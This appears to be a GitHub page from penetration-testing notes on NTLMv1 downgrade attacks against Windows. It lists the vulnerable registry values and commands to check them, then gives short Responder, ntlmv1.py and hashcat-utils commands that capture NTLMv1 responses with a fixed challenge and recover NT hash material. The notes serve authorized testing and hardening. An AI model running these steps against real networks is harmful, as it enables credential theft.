Skip to content

Latest commit

 

History

History
72 lines (45 loc) · 3.07 KB

ntlmv1-downgrade.md

File metadata and controls

72 lines (45 loc) · 3.07 KB

NTLMv1 Downgrade

Client sends NTLMv1 response when LmCompatibilityLevel exists and is 2 or lower, which can be downgraded to "NTLMv1 w/o SSP" when NtlmMinClientSec is 0x20 or lower:

Property Name Property Path
LmCompatibilityLevel HKLM\SYSTEM\CurrentControlSet\Control\Lsa
NtlmMinClientSec HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0

Check

Check with PowerShell:

PS > (Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name LmCompatibilityLevel).LmCompatibilityLevel
2
PS > $decValue = (Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0\ -Name NtlmMinClientSec).NtlmMinClientSec
PS > $hexValue = "0x" + [string]::Format("{0:x}", $decValue)
PS > $hexValue
0x20

Check with Seatbelt (example):

Cmd > .\Seatbelt.exe NTLMSettings

Exploit

{% content-ref url="/pentest/infrastructure/ad/authentication-coercion.md" %} authentication-coercion.md {% endcontent-ref %}

Exploit with Responder with a known challenge of 1122334455667788 (see Authentication Coercion to trigger callbacks):

$ sudo ./Responder.py -I eth0 -v --lm --disable-ess

ntlmv1-multi + crack.sh

Calculate the token:

$ python ntlmv1.py --ntlmv1 '<NTLMv1_RESPONSE_STRING>'

Check the final 2 bytes (4 characters) of the NT hash:

$ ~/tools/hashcat-utils/src/ct3_to_ntlm.bin <CT3> 1122334455667788